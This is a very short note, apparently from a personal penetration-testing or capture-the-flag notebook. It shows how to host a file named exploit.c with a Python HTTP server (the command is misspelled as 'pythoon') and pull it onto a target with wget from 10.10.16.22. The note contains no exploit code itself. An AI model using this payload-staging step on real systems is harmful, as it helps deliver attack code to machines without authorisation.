simple note

Server a http server to provide the payload, name it as exploit.c:

pythoon -m SimpleHTTPServer 80

wget http://10.10.16.22/exploit.c

Last updated

Was this helpful?